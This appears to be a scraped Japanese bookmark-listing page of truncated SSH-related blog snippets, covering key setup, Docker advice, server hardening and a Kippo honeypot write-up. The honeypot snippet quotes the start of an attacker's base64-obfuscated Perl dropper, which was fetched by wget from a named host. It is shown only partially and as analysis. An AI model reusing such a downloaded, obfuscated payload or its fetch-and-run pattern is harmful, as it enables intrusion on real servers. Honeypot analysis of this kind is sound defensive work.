The Teleport Access PlatformThe easiest, most secure way to access and protect your infrastructure Teleport Access On-demand, least privileged access, on a foundation of cryptographic identity and zero trust
不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
SSHに辞書攻撃して、サーバに侵入しようと試みるクラッカーの動向を追うために、ssh用のハニーポットを導入してみた。 名前は「Kippo」。 インストール手順はsshハニーポットをkippoで作ってみる を参考にさせていただいた。 構成としては以下のとおり。 ┌──────────────┐ │ Cracker │ └──────┬───────┘ │ │ port:22 │ │ ▼ ┌───────────────────┐ │ firewalld │ │ ↓ │ │ portfoward-to: │ │ 22222 │ │ ↓ │ │ Kippo │ └───────────────────┘ 2015-06-29 20:25:36+0900 [SSHService ssh-userauth on HoneyPotTransport,442,43.255.189.44] login a
これまで公開鍵ってディレクトリを作って scp してパーミッションを変えてーみたいにかなり面倒くさいことをしてたけど ssh-copy-id コマンドを使うと楽できるみたい。 Linux ディストリビューションなら最初から入ってるものも多そうだけど Mac OS X には入ってなかったので Homebrew から入れる。 $ brew install ssh-copy-id 何はともあれ公開鍵ペアを作る。 $ ssh-keygen -t rsa 作った公開鍵を、目的のホストに設置する。 以下のコマンドを叩くとパスワードでログインを促される。 $ ssh-copy-id -i ~/.ssh/id_rsa.pub <username>@<host> 上手くいけば公開鍵を使ってログインできるようになっているはず。 $ ssh <username>@<host> めでたしめでたし。
Dockerを使い始めた人がよくする質問といえば、「どうすればコンテナに入れますか?」です。その質問に対して、「コンテナ内でSSHサーバを起動すればいいよ」と答える人たちがいますが、これは非常にマズいやり方です。なぜその方法が間違いなのか、そして代わりにどうすればよいのかをこれから紹介します。 注:本記事へのコメントやシェアは、 Dockerブログ にアップされた標準版から行ってください。よろしくお願いします。 コンテナでSSHサーバを起動すべきではない …もちろん、コンテナ自体がSSHサーバである場合は除きます。 SSHサーバを起動したくなる気持ちは分かります。それはコンテナの”中に入る”簡単な方法だからです。この業界の人ならほぼ全員がSSHを一度は使ったことがあります。多くの人がSSHを日常的に使用し、公開鍵や秘密鍵、パスワード入力の省略、認証エージェント、そして時にはポート転送やその
(2015/1/30 追記)時期は不明ですが、現時点のgithub.comはEd25519鍵にも対応しています。 (2016/5/31 追記)「GitHubにバグ報告して賞金$500を頂いた話」で紹介した通り、既に弱い鍵はGitHubから削除され、新規登録もできなくなっています。 GitHub APIを利用して、GitHubの31661アカウントに登録されているSSH公開鍵64404個を取得してみました。抽出方法*1が適当すぎて偏りがあるような気もしますが、面白い結果が得られたと思うのでまとめてみます。 SSH鍵の種類 鍵の種類 個数 割合 RSA鍵 61749 (95.88%) DSA鍵 2647 (4.11%) ECDSA鍵 8 (0.01%) 約6万個の鍵のうち、8個だけECDSA(楕円DSA)鍵が見つかりました!常用しているのか試しに登録してみただけなのかはわかりませんが、何にせよ
複数の public key (公開鍵) を仕方なく作ってしまった。こういう時、相手サーバーによって使う private key (秘密鍵) を指定してアクセスしないといけない。.ssh/config に設定を加えると、サーバーごとに利用する key を切り替えてくれる。 key の生成 まず key の生成する。一般的な key の作り方は過去エントリー参照のこと。 clmemo@aka: SSH の公開鍵暗号方式によるログイン認証 ssh-keygen で複数の public key を作る。今回はタイプの違う 2 つの鍵を作った。-f オプションで鍵ファイルのファイル名を指定できる (デフォルトは .ssh/id)。 $ ssh-keygen -t dsa -f .ssh/id_dsa $ ssh-keygen -t rsa -f .ssh/id_rsa 作った public key
SSHが鍵認証されないとき、パーミッションを疑え。 – ブックマクロ開発に これがうっかり777になってた。ホームディレクトリが777だと永遠にauthorized_keysは無効化される。 気付くまでに30時間くらい試行錯誤して週末が消えた。 ああ…そうなのか… 結果的にこうしたら上手くいきました。 /home/usename [0755]/.ssh [0700]authorized_keys [0600] 一応、認証できているユーザーを参考にパーミッションのチェックもしていたはずなんですけど、場当たり的に変更してたせいで、一つを正しく設定したのに他の一つを間違って設定→混乱みたいなことやってました。最終的には「.ssh」ディレクトリのパーミッションが777になってました。間抜けすぎ。家族みんなで鍵掛けて最終的に開いてました的な。パーミションをいい加減に設定したらダメだね。 上手くいかな
Mac OS X から ssh 接続してもすぐ切れちゃう問題に対処 2008-02-26-2 [Tips][Mac] ここ最近、私を悩ます Mac OS X での困り事。 (1) Terminal から ssh でログインしてもしばらくすると切れちゃう。 (2) sshfs を使ってると同様に接続が切れるんだけど、 そのときうっかり Finder で変なところをいじると OS が固まっちゃう[2008-01-27-1]。 どうしたものかなあ、と思ってたらこんなページを発見! - keep-alive for ssh ttp://www.geocities.co.jp/AnimeComic/1098/documents/unixmemo/\ ssh-keepalive.html http://hnw.jp/documents/unixmemo/ssh-keepalive.html (追記08
久々 git のセットアップをすることになり、自分で書いた記事を参考にする。 » せっかちな人のための git 入門 - git をインストールし、共同で開発できる環境を整えるまで : 僕は発展途上技術者 いつのまにかはてなスターがたくさんつき、ブックマーク数も400を超えていた。さすがはてなユーザー。「git なにそれ?」というのが一般ユーザーはもちろん、多くのプログラマー(ブログ書いたり読んだり twitter 使ってたりすると僕らweb系、オープン系が多数派だと勘違いしてしまいそうになるが、決してそうではないのですよね)の反応だと思うのだが。。。 さて、上記記事では触れていない、共有レポジトリの作成方法を書き留めておきます。 まず準備としてリポジトリを使うことになる複数ユーザーを同一グループに所属させます。 太郎くん、次郎くんのアカウントを作成。 % sudo useradd tar
プログラミングを知り合いなどに教えるときに使ってるツール類。 前提だけども、こういったツール類をすぐに使いこなせるぐらいコンピュータ、インターネットに慣れてる人であること。 リモートじゃない場合はどうやって教えてるか 直接画面を見せながらプログラムを入力して、動かして説明してる。ファイルを渡すときはUSBメモリで渡す。 つまりこれらを各種ツールを使ってインターネットごしに同様にできるようにする。 繋ぐ(場所の問題の解決) まずは横にいる状態、つまりネットワーク的に同じ空間にいる状態を作らないと各種ツールを使うのに不便です。 グローバルIPで片方に繋がる環境があれば必要なかったりするかもしれないけど、必要であればVPNやSSHなどでトンネル掘るなりして、LAN環境を作ります。 VPN 手軽に使いたいならHamachiなどのP2Pでつなげるもの、しっかりやるならOpenVPNといったところか。
管理中のサーバで行っているセキュリティ設定を公開します。本当はこういうことを公開するのはよろしくないのですが、脆弱サーバが氾濫している現状そこが踏み台となってsshアタックされるのも迷惑極まりないので、最低限やっとけという内容でまとめました。*1 起動サービスと概要 iptables/Firewallの設定 iptablesの中身 limit-burstについて hashlimitについて hosts.allow/hosts.deny(TCP Wrapper)の設定 sshdの設定 その他の設定 Apacheの設定 Postfixの設定 Dovecotの設定 まとめ はてブさんは #の切り分けやめてくれないかな……。 起動サービスと概要 Apache (www) sshd smtp/pop bind (DNS) ntpd いくつかの注意点。 sftpで十分なのでftpdは使わない。WinS
はてなグループの終了日を2020年1月31日(金)に決定しました 以下のエントリの通り、今年末を目処にはてなグループを終了予定である旨をお知らせしておりました。 2019年末を目処に、はてなグループの提供を終了する予定です - はてなグループ日記 このたび、正式に終了日を決定いたしましたので、以下の通りご確認ください。 終了日: 2020年1月31日(金) エクスポート希望申請期限:2020年1月31日(金) 終了日以降は、はてなグループの閲覧および投稿は行えません。日記のエクスポートが必要な方は以下の記事にしたがって手続きをしてください。 はてなグループに投稿された日記データのエクスポートについて - はてなグループ日記 ご利用のみなさまにはご迷惑をおかけいたしますが、どうぞよろしくお願いいたします。 2020-06-25 追記 はてなグループ日記のエクスポートデータは2020年2月28
はじめに サエンバイノー(こんにちは)、Python界のメンソレータムです。さて猫も杓子もクラウドの時代ですが、みなさんいかがお過ごしでしょうか。先日ふと「DotCloud」というサービスを見かけてベータ登録したので、ご紹介致します。 DotCloudってなに? dotCloud - One home for all your apps DotCloudはいままでWebアプリケーションホスティングサービスの中で期待されていた領域に切り込もうとしてますよ。まず使える言語はPHP, Ruby, Python, Javaがいまのbetaの時点で使えて、さらにこれからリクエストがある言語にも対応しようとしてます。(ErlangとかSchemeとか)で、DBとかMQとかすでに有名所はいくつか使えて、なんでもリクエストがあれば対応するぜ!っていう勢い。またスケールに関してもスケールアップ、スケールアウ
主に新人向けとして、Unixサーバで作業をする際の注意点を書いておく。 ここに書いてある内容は絶対的なものではないし、会社や現場ごとにルールがあるので、適宜ルールに合わせて実践すれば良い。 ログを取れ 何をやったか、何をやらなかったか、というエビデンスのためにログは必ず残しておく。SSHクライアントによっては毎回自動的にログ取得する設定が可能なので、設定しておくと良いだろう。 作業後に問題が発生した場合に作業内容を確認するためにも使うため、必ずログは取得しておくこと。 (追記) 当たり前だが、コマンドとその出力をペアで取ることに意味がある。 set -x (set verbose) しろ ログを取得しても、コマンドラインを編集した際には以下のように非常に見づらいものとなってしまう。(がんばれば解析することは出来るが…) ESC[0mESC[27mESC[24mESC[JESC[1myasu
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く